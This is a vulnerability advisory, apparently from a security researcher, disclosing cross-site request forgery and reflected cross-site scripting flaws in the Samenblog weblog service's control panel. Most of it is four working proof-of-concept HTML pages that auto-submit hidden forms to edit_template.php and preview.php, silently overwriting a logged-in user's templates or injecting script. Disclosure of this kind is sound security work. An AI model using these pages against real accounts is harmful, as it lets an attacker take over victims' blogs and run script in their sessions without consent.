SamenBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting
Posted on 23 February 2016
Document Title:
===============
SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting

References (Source):
====================
http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt

Release Date:
=============
2016-02-20

Product & Service Introduction:
===============================
Samenblog lets its users publish their information, memories, essays and so on through a professional weblog-publishing system in a simple environment; it aims to serve both professional and amateur users.

Vulnerability Type:
===================
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
======================
I discovered a client-side cross site request forgery vulnerability and a cross site scripting vulnerability in Samenblog.com (Weblog Service).

The template editor at /cpanel/edit_template.php accepts the POST tasks doedit, doeditpage and doeditarchive without an anti-CSRF token, so a page under the attacker's control can auto-submit a form that silently overwrites the weblog template, the extra-pages template or the archive template of a user who is logged in to the control panel. The template body is arbitrary HTML, so the attacker fully controls what the victim's weblog renders afterwards.

The preview endpoint at /cpanel/preview.php reflects the templatearchive POST parameter into its response without output encoding, so script supplied in that parameter executes in the origin of samenblog.com. Because the request is a plain POST with no token, the payload can be delivered from a third-party page in the same way as the CSRF proof of concept.

Author:
=======
Ehsan Hosseini
http://ehsansec.ir/

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Proof of Concept (PoC):
=======================
Each page below auto-submits a hidden form to the control panel as soon as it loads; the victim only has to open it while logged in. (The onload handler must reference the form by its name attribute, otherwise nothing is submitted.)

-- Cross Site Request Forgery --

-- PoC : Edit Themes --

-- PoC 1 (weblog template) --

<html>
<head>
<title>Edit Weblog Template - Csrf</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='info'>
<input type="hidden" name="template" value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doedit'>
</form>
</body>
</html>

-- PoC 2 (extra pages template) --

<html>
<head>
<title>Edit The extra pages templates - Csrf</title>
</head>
<body onload="document.infoo.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infoo'>
<input type="hidden" name='templatepage' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditpage'>
</form>
</body>
</html>

-- PoC 3 (archive template) --

<html>
<head>
<title>Edit The archive templates - Csrf</title>
</head>
<body onload="document.infooo.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php' method='POST' name='infooo'>
<input type="hidden" name='templatearchive' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditarchive'>
</form>
</body>
</html>

-- Cross Site Scripting --

<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.preview.submit()">
<form action='http://samenblog.com/cpanel/preview.php' method='POST' name='preview'>
<input type="hidden" name='templatearchive' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>

Contact:
========
hehsan979@gmail.com
info@ehsansec.ir